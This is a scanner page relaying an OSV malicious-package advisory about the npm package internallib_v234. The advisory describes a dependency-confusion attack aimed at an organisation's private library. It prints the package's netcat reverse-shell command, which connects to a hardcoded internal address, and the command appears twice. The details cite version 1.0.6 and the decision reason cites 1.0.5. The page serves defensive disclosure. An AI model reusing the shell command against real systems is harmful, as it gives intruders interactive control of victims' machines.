OSV Malicious Advisory
scanned 4h ago · by OpenSSF/OSVOpenSSF/OSV advisory MAL-2026-6796 confirms this npm version as malicious. internallib_v234@1.0.6 exports a `command()` function whose body unconditionally invokes `/bin/bash -c "nc -vn 10.0.74.133 13337 -e /bin/bash"`, opening an interactive reverse shell from the installer to a hardcoded RFC1918 endpoint (10.0.74.133:13337). Prior to launching the shell, index.js runs `whereis nc` to confirm netcat is available on the host...
Advisory
MAL-2026-6796
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in internallib_v234 (npm)
Details
internallib_v234@1.0.6 exports a `command()` function whose body unconditionally invokes `/bin/bash -c "nc -vn 10.0.74.133 13337 -e /bin/bash"`, opening an interactive reverse shell from the installer to a hardcoded RFC1918 endpoint (10.0.74.133:13337). Prior to launching the shell, index.js runs `whereis nc` to confirm netcat is available on the host. The package also exhibits a dependency-confusion shape: the name mimics an internal-library naming convention, it declares itself as its own dependency (`internallib_v234: ^1.0.0`), and CI configuration references a private Verdaccio registry (`npm update --registry http://0.0.0.0:4873/`). The combination indicates a targeted attack against an organization that hosts a private `internallib_v234` internally; installing/loading this public version and invoking the exported function yields interactive shell access on the installer's machine to the attacker.
Decision reason
OpenSSF Malicious Packages via OSV confirms internallib_v234@1.0.5 as malicious (MAL-2026-6796): Malicious code in internallib_v234 (npm)
Source & flagged code
0 flaggedNo flagged code excerpts are attached to this scan.
Findings
1 High
HighOsv Malicious Advisory